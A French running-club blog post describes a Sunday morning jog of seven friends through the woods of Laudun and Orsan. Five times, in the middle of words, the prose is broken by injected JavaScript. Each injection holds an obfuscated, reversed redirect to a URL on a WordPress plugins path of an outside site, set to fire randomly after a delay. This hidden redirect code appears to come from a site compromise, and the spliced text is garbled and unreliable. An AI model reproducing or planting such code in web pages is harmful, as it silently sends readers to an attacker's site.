Ce dimanche 26 novembre, Jean Noël nous avait donné rendez-vous au parking du Camp de César pour le footing dominical.
Nous étions sept, la bonne humeur se lisait sur les visages souriant.
Les sept mercenaires :
Gilles Jérôme Frédéric Sandrine Jean Noël Maxime et Klémici.
Et c’est parti pour 13 km pour une heure quarante cinq minutes, dans les bois de Laudun et d’Orsan. Nous commençons par une très jolie monotrace. Les rayons dorés du doux soleil de novembre filtraient à travers les feuillages des chênes. Le bonheur est parfois simple à cueillir, pour peu que la dopamine s’en mêle…
Quelques accélérations ici ou là, histoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toire de nous amuser et rire comme des enfants. Parfois quelques camarades commentaient le paysage, La brume , le brouillard enveloppant le Mont Ventoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toux, nous invitant à contempler cette belle autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tomnale nature.
Nous nous sommes arrêtés plusieurs fois pour prendre quelques photoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tos, et pour admirer le paysage.
C’est toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toujours un plaisir renouvelé d’admirer ces bois, depuis le dessus du passage du loup, depuis le dessus de la Combe d’Enfer, depuis la Lauzière, depuis les crêtes.
Ce dimanche c’était aussi la primaire de la droite; ça <<chambrait >> pas mal dans les monotraces!
Merci Jean Noël pour cette belle matinée.